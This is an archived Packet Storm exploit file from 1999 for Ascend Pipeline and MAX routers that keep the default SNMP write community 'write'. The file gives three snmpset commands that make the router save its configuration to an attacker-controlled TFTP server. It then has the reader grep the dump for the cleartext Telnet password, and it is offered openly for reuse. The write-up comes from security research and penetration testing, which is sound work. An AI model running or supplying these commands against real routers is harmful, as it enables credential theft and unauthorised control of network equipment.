exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

002.txt

002.txt
Posted Dec 24, 1999
Authored by Suid | Site suid.kg

SUID Advisory #2 - Exploit for ascend router bugs as per NAI advisory.

SHA-256 | 8205e35efb8995ce9612e8285e123dadb6501023b4f5997f06706dd7fd8610a9

002.txt

Change Mirror Download
suid@suid.kg - exploit for ascend router bugs as per nai advisory:
http://www.nai.com/nai_labs/asp_set/advisory/26_ascendrouter_adv.asp

Summary:

Ascend routers running version 5 of The Ascend OS (TAOS) by default have SNMP write enabled and the default community
name of "write".

For a long time Ascend Pipeline and MAX series routers/access servers have been vulnerable to this attack. Although it
is widely known about and fixed, many boxes are still vulnerable to it.

ADM seem to have an exploit for this allready, although I do not know if they have published it. See ADMsnmp scanner
for SNMP scanning help.

I am writing this up because I had the need to use it one day on a client penetration test. I may need to refer to it
again some day. As may you.

Exploit Information:

For this exploit to work, the routers write community must be enabled and set to "write"

You will need to use something like ucd SNMP tools set the following object ID's:

sysConfigTftpHostAddr (1.3.6.1.4.1.529.5.3.0) Type = IP Address
sysConfigTftpFilename (1.3.6.1.4.1.529.5.4.0) Type = String

Now setup a TFTP server somewhere. Make sure the router you are targetting can write a file there if it wants to.

Set the sysConfigTftpHostAddr OID to the IP address of your TFTP server:

$ snmpset <router> write .1.3.6.1.4.1.529.5.3.0 a "<ip of your TFTP server>"

Set the sysConfigTftpFilename OID to a filename writable on your TFTP server.

$ snmpset <router> write .1.3.6.1.4.1.529.5.4.0 s "<filename>"

Next set the sysConfigTftpCmd OID on the router to 1 (Save)

$ snmpset <router> write .1.3.6.1.4.1.529.5.1.1.0 i 1

The router will begin to save its configuration file to your TFTP server. Grep for "Telnet PW".

You now have the Telnet password to the router in cleartext.


Notes:

- All this information was discerned from ascend.mib from ftp.ascend.com

- This problem has been known about since March 1998.

- The Ascend web site has some information regarding what to do if your router is vulnerable to this at:
http://www.ascend.com/2694.html

Links:

- Ascend http://www.ascend.com/, http://www.ascend.com/2694.html
- NAI http://www.nai.com/, http://www.nai.com/nai_labs/asp_set/advisory/26_ascendrouter_adv.asp
- ADM ftp://adm.isp.at/pub/ADM/


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close